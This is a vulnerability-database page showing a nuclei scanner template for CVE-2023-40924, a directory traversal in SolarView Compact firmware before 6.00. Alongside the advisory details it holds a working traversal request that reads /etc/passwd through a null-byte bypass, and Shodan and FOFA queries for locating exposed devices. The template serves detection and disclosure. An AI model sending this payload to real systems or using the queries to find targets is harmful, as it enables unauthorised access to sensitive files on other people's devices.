Lucene search
K

SolarView Compact < 6.00 - Directory Traversal

šŸ—“ļøĀ 02 Jul 2026Ā 09:36:57Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 15Ā Views

Directory traversal in SolarView Compact before 6.00 lets unauthenticated read downloader file.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-40924
8 Sep 202313:15
–attackerkb
Circl
CVE-2023-40924
8 Sep 202316:19
–circl
CNNVD
Contec SolarView Compact Path Traversal Vulnerability
8 Sep 202300:00
–cnnvd
CVE
CVE-2023-40924
8 Sep 202300:00
–cve
Cvelist
CVE-2023-40924
8 Sep 202300:00
–cvelist
EUVD
EUVD-2023-45463
3 Oct 202520:07
–euvd
NVD
CVE-2023-40924
8 Sep 202313:15
–nvd
OSV
CVE-2023-40924
8 Sep 202313:15
–osv
Prion
Directory traversal
8 Sep 202313:15
–prion
Positive Technologies
PT-2023-27704
8 Sep 202300:00
–ptsecurity
Rows per page
id: CVE-2023-40924

info:
  name: SolarView Compact < 6.00 - Directory Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    SolarView Compact before version 6.00 is vulnerable to directory traversal via the file parameter in downloader.php. An unauthenticated attacker can read arbitrary files from the system by using path traversal sequences with a null byte bypass to access sensitive files such as /etc/passwd.
  impact: |
    An attacker can read sensitive system files including /etc/passwd which may contain password hashes on embedded devices, potentially leading to full system compromise.
  remediation: |
    Upgrade SolarView Compact to version 6.00 or later.
  reference:
    - https://github.com/Yobing1/CVE-2023-40924/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-40924
    epss-score: 0.02885
    epss-percentile: 0.85148
    cwe-id: CWE-22
    cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact_firmware
    shodan-query:
      - http.html:"SolarView Compact"
      - http.favicon.hash:"-244067125"
      - http.html:"solarview compact"
    fofa-query:
      - body="solarview compact"
      - icon_hash="-244067125"
  tags: cve,cve2023,lfi,solarview,contec,traversal,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../etc/passwd%00.jpg"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c66bba0036a4e1f0324895ed121247907f5e788e2f3db6d8408f47ca68f8444a022100e418cda3e8e6c23ba55d5b530f30589ae3c11d6632608f107f067b1bc58c4625:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2026 09:57Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.02885
SSVC
15